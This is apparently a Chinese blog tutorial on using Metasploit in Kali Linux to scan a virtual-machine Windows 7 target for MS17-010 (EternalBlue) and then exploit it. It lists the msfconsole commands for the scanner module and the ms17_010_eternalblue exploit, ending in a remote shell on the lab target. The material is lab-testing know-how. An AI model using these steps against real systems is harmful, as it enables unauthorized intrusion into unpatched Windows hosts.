美文网首页渗透之路
使用metasploit 检测MS17-010及利用

使用metasploit 检测MS17-010及利用

作者: Echo_Dream | 来源:发表于2018-01-22 22:14 被阅读0次

        Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击(也通常用于回溯分析)。

        此次采用kali Linux系统集成的metasploit进行测试验证MS17-010(永恒之蓝,著名比特币勒索漏洞)。实验环境采用虚拟机,kali 测试机,windows 7 x64 测试靶机。


    一、使用scanner下扫描模块扫描是否存在漏洞。

    ①启用msf之前需要启用postgres服务

    ②msfconsole //启用msf

    ③search smb_ms17_010  //使用search 查找ms17_010利用工具目录

    ④use auxiliary/scanner/smb/smb_ms17_010  //调用scanner smb_ms17_010模块进行扫描

    并使用show options查看设置参数

    ⑥set RHOSTS 192.168.198.136  //设置扫描地址(可设置扫描段 eg: set RHOSTS 192.168.198.0/24)

    设置好之后,使用show options查看配置信息,并使用exploit进行测试(利用测试,显示绿色的+,以及提示信息,即为存在漏洞主机)。

    二、使用exploit下利用模块进行漏洞攻击。

    ①use exploit/windows/smb/ms17_010_eternalblue  //调用exploit下的ms17_010_eternalblue模块

    使用show options查看参数设置

    ③set RHOST 192.168.198.136   //设置目标靶机

    并使用exploit调用漏洞测试,成功拿到目标shell

    相关文章

      网友评论

        本文标题:使用metasploit 检测MS17-010及利用

        本文链接:https://www.haomeiwen.com/subject/ezmraxtx.html